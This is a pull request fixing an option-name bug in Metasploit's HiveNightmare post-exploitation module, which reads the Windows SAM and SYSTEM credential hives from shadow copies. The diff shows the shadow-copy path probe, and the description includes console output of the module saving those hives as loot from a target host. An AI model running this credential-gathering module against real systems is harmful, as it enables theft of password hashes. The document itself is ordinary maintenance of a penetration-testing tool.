### PR TITLE
Fix HiveNightmare Option Reference

### DIFF
--- a/modules/post/windows/gather/credentials/windows_sam_hivenightmare.rb
+++ b/modules/post/windows/gather/credentials/windows_sam_hivenightmare.rb
@@ -110,7 +110,7 @@ class MetasploitModule < Msf::Post
       most_recent_shadow_copy = nil
       index_most_recent_shadow_copy = -1
 
-      for i in 0..datastore['NBRE_ITER']
+      for i in 0..datastore['ITERATIONS']
         handle = check_path("\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy#{i}\\Windows\\System32\\config\\SAM")
 
         next unless handle


### PR DESCRIPTION
This fixes a small bug in the HiveNightmare module where the old `NBRE_ITER` option was used instead of the new `ITERATIONS` one. When that was the case because it wasn't set the loop would carry on forever causing the module to hang. With this fix in place, the module should exit the loop after the specified number of iterations and then carry on to download the files.

Example:
```
msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > run

[+] SAM data found in HarddiskVolumeShadowCopy1!
[+] Retrieving files of index 1 as they are the most recently modified...
[+] SAM data saved at /home/smcintyre/.msf4/loot/20210810092928_default_192.168.159.118_windows.sam_360734.bin
[+] SYSTEM data saved at /home/smcintyre/.msf4/loot/20210810092944_default_192.168.159.118_windows.system_117417.bin
[+] SAM and SYSTEM data were leaked!
[*] Post module execution completed
msf6 post(windows/gather/credentials/windows_sam_hivenightmare) >
```

## Testing Steps
- [x] Set the `SESSION` option
- [x] Run the module, leaving the rest of the options at their default values
- [x] See the module complete successfully (note that downloading the files can take a minute so it still may hang there but at that point you should see the "Retrieving files..." message).